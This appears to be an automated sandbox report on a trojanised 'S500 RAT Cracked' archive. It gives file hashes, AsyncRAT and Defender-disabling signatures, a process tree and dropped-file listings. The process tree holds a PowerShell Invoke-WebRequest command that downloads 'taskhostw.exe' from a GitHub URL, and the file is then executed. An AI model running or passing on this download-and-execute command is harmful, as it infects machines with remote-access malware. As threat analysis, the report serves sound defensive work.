Analysis

  • max time kernel
    1310s
  • max time network
    1217s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20-03-2024 17:22

General

  • Target

    S500 RAT Cracked + Source .rar

  • Size

    147.7MB

  • MD5

    5a39139ce5f13297aea9c5839d1447c6

  • SHA1

    90c68a4f451c2fe75c6325198693b6f52971d573

  • SHA256

    54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff

  • SHA512

    7a98ebd2ffb9dec789ddf5adf9fe2dad5a9527cb2e2c038933722012a9ead3fac98280dbf32f0ef5aaa4b6c57afe7768cdd2018e632fbe415c56925833e536b1

  • SSDEEP

    3145728:Lp+2zwG6H0uXZ2nlHp75eJmivGPIpVQNQSsnyDZ5lc:Ls2cG1FlHp7ImqO8VIGyba

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 2 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2332
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:312
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:832
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3020
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
      1⤵
        PID:1540
      • C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
        "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\System32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3936
          • C:\Windows\system32\chcp.com
            chcp 65001
            3⤵
              PID:2080
            • C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
              ServerRegistrationManager.exe
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:1512
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
              3⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3136
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe
              3⤵
                PID:4908
          • C:\Windows\system32\wbem\WmiApSrv.exe
            C:\Windows\system32\wbem\WmiApSrv.exe
            1⤵
              PID:1372
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Resources\stub.txt
              1⤵
              • Opens file in notepad (likely ransom note)
              PID:4724
            • C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
              "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:224
              • C:\Windows\System32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2CD.tmp\D2CE.tmp\D2CF.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4148
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  3⤵
                    PID:4600
                  • C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
                    ServerRegistrationManager.exe
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:1224
              • C:\Windows\system32\wbem\WmiApSrv.exe
                C:\Windows\system32\wbem\WmiApSrv.exe
                1⤵
                  PID:3716
                • C:\Users\Admin\Desktop\Stub.exe
                  "C:\Users\Admin\Desktop\Stub.exe"
                  1⤵
                  • Executes dropped EXE
                  PID:192

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerRegistrationManager.exe.log

                  Filesize

                  2KB

                  MD5

                  fa931350508a2b855cce92719c4c207c

                  SHA1

                  3b6eb7b920d1c70b9f61b3745523b20828ecf21b

                  SHA256

                  1b6609def0e3a0533c446233db9438cdc1901a22acae76affbc4866e25595b0f

                  SHA512

                  b85d45035b1e62df0c1032c796796f6e30dd03a992744d9a67e0b812b8e4e690b4acc19921931bdac5f0e0cb4d5ef54f2161da3aadc922fee27a3f49fad6a856

                • C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt

                  Filesize

                  60KB

                  MD5

                  fd7b1162b84b0add4146e3bc0d13b7dd

                  SHA1

                  1fb46807f499267832aa444e12c403df880855bb

                  SHA256

                  972c912943000017fe92e563d4b7a5147f15825718edcb17307af79f85ac5f10

                  SHA512

                  6f5ff1aff1c899f9ae48cd177fd1bb277b2b9a7395858de1077392c293a4c68307d55d84a7c9968342da5a1296e720b00d8cd6f42b5faa11b7c643260eac300d

                • C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat

                  Filesize

                  1KB

                  MD5

                  fc4af7384f0b6f274dd3e745f0aceeaa

                  SHA1

                  31b310f869b15b84e52ef282cabaee974e5043cf

                  SHA256

                  f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34

                  SHA512

                  dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k21x3pv.pbi.ps1

                  Filesize

                  1B

                  MD5

                  c4ca4238a0b923820dcc509a6f75849b

                  SHA1

                  356a192b7913b04c54574d18c28d46e6395428ab

                  SHA256

                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                  SHA512

                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                • C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

                  Filesize

                  142KB

                  MD5

                  9c43f77cb7cff27cb47ed67babe3eda5

                  SHA1

                  b0400cf68249369d21de86bd26bb84ccffd47c43

                  SHA256

                  f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e

                  SHA512

                  cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

                • C:\Users\Admin\Desktop\Resources\stub.txt

                  Filesize

                  121KB

                  MD5

                  3fc302b81fdf520e4d3a170fe3ed0f0d

                  SHA1

                  9d821cc04064add1192decb54c76fdc9c4ef5747

                  SHA256

                  da3ab74adcfac4c84c23b564d7923beb706f62eb279cc6d945ac163721457f32

                  SHA512

                  b71077bb6703454c437cfdba4be2e9b86dfc9e3bb63ac89eeb9be0746c4f0b6b9d4bd16f7d44da9df89ab543420320dcd521115ea776c77fe32825836a86a552

                • C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

                  Filesize

                  4KB

                  MD5

                  c60e527a85f285ddc66c2fcf160b1be7

                  SHA1

                  abcf2b6bffea9f0f30190783f6eae2434ef7a9a8

                  SHA256

                  35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f

                  SHA512

                  77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

                • C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

                  Filesize

                  1.9MB

                  MD5

                  0f07705bd42d86d77dab085c42775244

                  SHA1

                  7e4b5c367183f4753a8d610e353c458c3def3888

                  SHA256

                  cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443

                  SHA512

                  851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

                • C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

                  Filesize

                  427B

                  MD5

                  531208ea558a68c95339bea9517845c3

                  SHA1

                  95865bbeb196cf007626c92cdef1524c9b16dc5a

                  SHA256

                  dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a

                  SHA512

                  46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

                • C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

                  Filesize

                  18.0MB

                  MD5

                  5b52658c4517684971de10a6b7a67c30

                  SHA1

                  f0820c52617ebacaf53d8b8d97f1a42c712888bd

                  SHA256

                  3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31

                  SHA512

                  ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

                • C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

                  Filesize

                  14.6MB

                  MD5

                  3c2de6bc2aad943c8ccfd2ae1d2db50d

                  SHA1

                  3c909af7b1e92472fec95641cfb0baa65d434886

                  SHA256

                  27c469c1ab1ecb80bc4fd2d60966174cd973456d584e0aa836811e726550d53d

                  SHA512

                  37a0c33b12cdaf1657f8080e2fe94ba7dc648e514f5ac779c3bb0a7938dfadfb6ee26db0204e10a194645da00883a7a4db2d04bd0850494ba2d12516c344000e

                • C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

                  Filesize

                  16.7MB

                  MD5

                  aa2fc72b58059e5e7e9e7003ab466322

                  SHA1

                  e171576589134431baccb40d308e7dcbc776e087

                  SHA256

                  f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88

                  SHA512

                  26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

                • C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

                  Filesize

                  5.2MB

                  MD5

                  295a148a835de7e9dcfd7b852631289a

                  SHA1

                  91981906fdf1f36c6f0a2a1243457409588379ae

                  SHA256

                  963bcb01e62f49a6a26320fd1d4c7ba1cc8883de6fb5478bdc1509b3da699e86

                  SHA512

                  49363841c754d6ddee2c21668a389663065177c3bb97c827925e56c5957e60428bd33f82ce2666587f55cb5fdc15cb9e92708d4d8e2472706253a80e42239a5f

                • C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

                  Filesize

                  221KB

                  MD5

                  17cbdd9e4cb0ede2fad8c08c05fdaa84

                  SHA1

                  74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c

                  SHA256

                  d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441

                  SHA512

                  1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

                • C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

                  Filesize

                  2.2MB

                  MD5

                  af527b22b92a23c38a492c5961cf2643

                  SHA1

                  15106adfa13415287b3e9d8deba21df53cb92eda

                  SHA256

                  4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a

                  SHA512

                  543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

                • C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

                  Filesize

                  19KB

                  MD5

                  3aaae3cec15b86693ae9fb8e1507c872

                  SHA1

                  ed8d0a139c609eb886482718ec2ecf96cbbe8c84

                  SHA256

                  a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b

                  SHA512

                  407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463

                • memory/224-542-0x0000000000400000-0x0000000000439000-memory.dmp

                  Filesize

                  228KB

                • memory/1224-543-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1224-535-0x00007FFC5D0C0000-0x00007FFC5D1EC000-memory.dmp

                  Filesize

                  1.2MB

                • memory/1224-547-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-548-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp

                  Filesize

                  156KB

                • memory/1224-541-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-539-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-540-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-538-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-549-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-537-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-536-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-544-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-550-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-551-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-534-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp

                  Filesize

                  156KB

                • memory/1224-531-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-530-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1224-552-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-553-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-555-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1224-556-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-260-0x000001E29B8D0000-0x000001E29B902000-memory.dmp

                  Filesize

                  200KB

                • memory/1512-257-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-283-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-287-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

                  Filesize

                  1024KB

                • memory/1512-289-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

                  Filesize

                  1024KB

                • memory/1512-290-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

                  Filesize

                  1024KB

                • memory/1512-291-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

                  Filesize

                  1024KB

                • memory/1512-281-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-370-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1512-239-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1512-240-0x000001E280000000-0x000001E2810C4000-memory.dmp

                  Filesize

                  16.8MB

                • memory/1512-241-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-243-0x000001E29B2D0000-0x000001E29B4C2000-memory.dmp

                  Filesize

                  1.9MB

                • memory/1512-252-0x00007FFC4BDB0000-0x00007FFC4BEDC000-memory.dmp

                  Filesize

                  1.2MB

                • memory/1512-280-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-251-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp

                  Filesize

                  156KB

                • memory/1512-254-0x000001E29B910000-0x000001E29BB50000-memory.dmp

                  Filesize

                  2.2MB

                • memory/1512-255-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-256-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-278-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-277-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-276-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-275-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp

                  Filesize

                  156KB

                • memory/1512-274-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-273-0x000001E2A1D00000-0x000001E2A1D3C000-memory.dmp

                  Filesize

                  240KB

                • memory/1512-268-0x000001E2A1CA0000-0x000001E2A1CAA000-memory.dmp

                  Filesize

                  40KB

                • memory/1512-267-0x000001E2A1FC0000-0x000001E2A1FD2000-memory.dmp

                  Filesize

                  72KB

                • memory/1512-266-0x000001E2A1F90000-0x000001E2A1F9C000-memory.dmp

                  Filesize

                  48KB

                • memory/1512-264-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-263-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1512-282-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-261-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-259-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1512-258-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

                  Filesize

                  64KB

                • memory/1800-262-0x0000000000400000-0x0000000000439000-memory.dmp

                  Filesize

                  228KB

                • memory/1800-522-0x0000000000400000-0x0000000000439000-memory.dmp

                  Filesize

                  228KB

                • memory/1800-233-0x0000000000400000-0x0000000000439000-memory.dmp

                  Filesize

                  228KB

                • memory/3136-521-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB

                • memory/3136-403-0x000002292F1C0000-0x000002292F966000-memory.dmp

                  Filesize

                  7.6MB

                • memory/3136-396-0x0000022916090000-0x00000229160A0000-memory.dmp

                  Filesize

                  64KB

                • memory/3136-381-0x000002292E4F0000-0x000002292E566000-memory.dmp

                  Filesize

                  472KB

                • memory/3136-378-0x0000022916060000-0x0000022916082000-memory.dmp

                  Filesize

                  136KB

                • memory/3136-376-0x0000022916090000-0x00000229160A0000-memory.dmp

                  Filesize

                  64KB

                • memory/3136-377-0x0000022916090000-0x00000229160A0000-memory.dmp

                  Filesize

                  64KB

                • memory/3136-372-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

                  Filesize

                  9.9MB